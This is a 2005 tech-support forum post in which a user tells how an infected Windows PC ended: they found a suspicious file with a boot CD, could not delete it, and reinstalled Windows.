  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 07 December 2005 - 03:11 AM

Just to complete this posting with the sad last chapter:

I have burned the "ultimatebootcd" from www.ultimatebootcd.org, so I was able to
start the computer from the CD. However, most of the tools on that CD were unable
to even detect the C drive. It seems that a piece of software was missing to make the
NTFS-formatted C drive visible to these tools. Only one program was able to read and
display the contents of the C drive. With this tool, I found that indeed the file dxmsrv.exe
was on C:\Windows\system32, as the program l2mfix had detected. However, with the
tools from the ultimatebootcd one could only read, not write or delete files.

Since I was not sure wether this program might still be used or activated at some
time (like a "sleeper"), I finally decided to delete everything and to reinstall Windows
from the scratch.

I have learned a lot about PC's in the last weeks. And I have become more sensible
about the virus issues: It seems that in the last three, four years malware production
has been professionalized and is in the hands of skilled full-time developers. As a
consequence, AV software with runtime virus detection and a good firewall is an
absolute must.


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users